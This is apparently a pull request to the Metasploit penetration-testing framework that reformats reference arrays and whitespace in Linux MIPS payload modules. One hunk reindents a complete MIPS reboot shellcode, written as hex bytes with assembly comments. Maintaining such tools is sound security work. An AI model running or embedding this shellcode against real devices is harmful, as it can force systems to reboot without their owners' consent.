### PR TITLE
Fix references and whitespace in MIPS payloads.

### DIFF
--- a/modules/payloads/singles/linux/mipsbe/reboot.rb
+++ b/modules/payloads/singles/linux/mipsbe/reboot.rb
@@ -22,7 +22,10 @@ module Metasploit3
           'Michael Messner <devnull@s3cur1ty.de>', #metasploit payload
           'rigan - <imrigan@gmail.com>'  #original payload
         ],
-      'References'    => [['URL', 'http://www.shell-storm.org/shellcode/files/shellcode-795.php']],
+      'References'    =>
+        [
+          ['URL', 'http://www.shell-storm.org/shellcode/files/shellcode-795.php']
+        ],
       'License'       => MSF_LICENSE,
       'Platform'      => 'linux',
       'Arch'          => ARCH_MIPSBE,

--- a/modules/payloads/singles/linux/mipsbe/reboot.rb
+++ b/modules/payloads/singles/linux/mipsbe/reboot.rb
@@ -14,15 +14,15 @@ module Metasploit3
     super(merge_info(info,
       'Name'          => 'Linux Reboot',
       'Description'   => %q{
-                A very small shellcode for rebooting the system.
-                This module is sometimes helpful for testing purposes.
+            A very small shellcode for rebooting the system.
+            This payload is sometimes helpful for testing purposes.
          },
       'Author'        =>
         [
           'Michael Messner <devnull@s3cur1ty.de>', #metasploit payload
           'rigan - <imrigan@gmail.com>'  #original payload
         ],
-      'References'    => ['URL', 'http://www.shell-storm.org/shellcode/files/shellcode-795.php'],
+      'References'    => [['URL', 'http://www.shell-storm.org/shellcode/files/shellcode-795.php']],
       'License'       => MSF_LICENSE,
       'Platform'      => 'linux',
       'Arch'          => ARCH_MIPSBE,
@@ -35,16 +35,15 @@ module Metasploit3
   end
 
   def generate
-
     shellcode =
-        "\x3c\x06\x43\x21" +  #lui     a2,0x4321
-        "\x34\xc6\xfe\xdc" +  #ori     a2,a2,0xfedc
-        "\x3c\x05\x28\x12" +  #lui     a1,0x2812
-        "\x34\xa5\x19\x69" +  #ori     a1,a1,0x1969
-        "\x3c\x04\xfe\xe1" +  #lui     a0,0xfee1
-        "\x34\x84\xde\xad" +  #ori     a0,a0,0xdead
-        "\x24\x02\x0f\xf8" +  #li      v0,4088
-        "\x01\x01\x01\x0c"    #syscall 0x40404
+      "\x3c\x06\x43\x21" +  #lui     a2,0x4321
+      "\x34\xc6\xfe\xdc" +  #ori     a2,a2,0xfedc
+      "\x3c\x05\x28\x12" +  #lui     a1,0x2812
+      "\x34\xa5\x19\x69" +  #ori     a1,a1,0x1969
+      "\x3c\x04\xfe\xe1" +  #lui     a0,0xfee1
+      "\x34\x84\xde\xad" +  #ori     a0,a0,0xdead
+      "\x24\x02\x0f\xf8" +  #li      v0,4088
+      "\x01\x01\x01\x0c"    #syscall 0x40404
 
     return super + shellcode
   end

--- a/modules/payloads/singles/linux/mipsle/exec.rb
+++ b/modules/payloads/singles/linux/mipsle/exec.rb
@@ -22,7 +22,7 @@ module Metasploit3
           'Michael Messner <devnull@s3cur1ty.de>', #metasploit payload
           'entropy@phiral.net'  #original payload
         ],
-      'References'    => ['URL', 'http://www.exploit-db.com/exploits/17940/'],
+      'References'    => [['EDB', '17940']],
       'License'       => MSF_LICENSE,
       'Platform'      => 'linux',
       'Arch'          => ARCH_MIPSLE,

--- a/modules/payloads/singles/linux/mipsle/exec.rb
+++ b/modules/payloads/singles/linux/mipsle/exec.rb
@@ -22,7 +22,10 @@ module Metasploit3
           'Michael Messner <devnull@s3cur1ty.de>', #metasploit payload
           'entropy@phiral.net'  #original payload
         ],
-      'References'    => [['EDB', '17940']],
+      'References'    =>
+        [
+          ['EDB', '17940']
+        ],
       'License'       => MSF_LICENSE,
       'Platform'      => 'linux',
       'Arch'          => ARCH_MIPSLE,

--- a/modules/payloads/singles/linux/mipsle/reboot.rb
+++ b/modules/payloads/singles/linux/mipsle/reboot.rb
@@ -22,7 +22,7 @@ module Metasploit3
           'Michael Messner <devnull@s3cur1ty.de>', #metasploit payload
           'rigan - <imrigan@gmail.com>'  #original payload
         ],
-      'References'    => ['URL', 'http://www.shell-storm.org/shellcode/files/shellcode-795.php'],
+      'References'    => [['URL', 'http://www.shell-storm.org/shellcode/files/shellcode-795.php']],
       'License'       => MSF_LICENSE,
       'Platform'      => 'linux',
       'Arch'          => ARCH_MIPSLE,

--- a/modules/payloads/singles/linux/mipsle/reboot.rb
+++ b/modules/payloads/singles/linux/mipsle/reboot.rb
@@ -22,7 +22,10 @@ module Metasploit3
           'Michael Messner <devnull@s3cur1ty.de>', #metasploit payload
           'rigan - <imrigan@gmail.com>'  #original payload
         ],
-      'References'    => [['URL', 'http://www.shell-storm.org/shellcode/files/shellcode-795.php']],
+      'References'    =>
+        [
+          ['URL', 'http://www.shell-storm.org/shellcode/files/shellcode-795.php']
+        ],
       'License'       => MSF_LICENSE,
       'Platform'      => 'linux',
       'Arch'          => ARCH_MIPSLE,


### PR DESCRIPTION
This ensures references are 2d arrays, and moves the exploitdb ref to use "EDB".
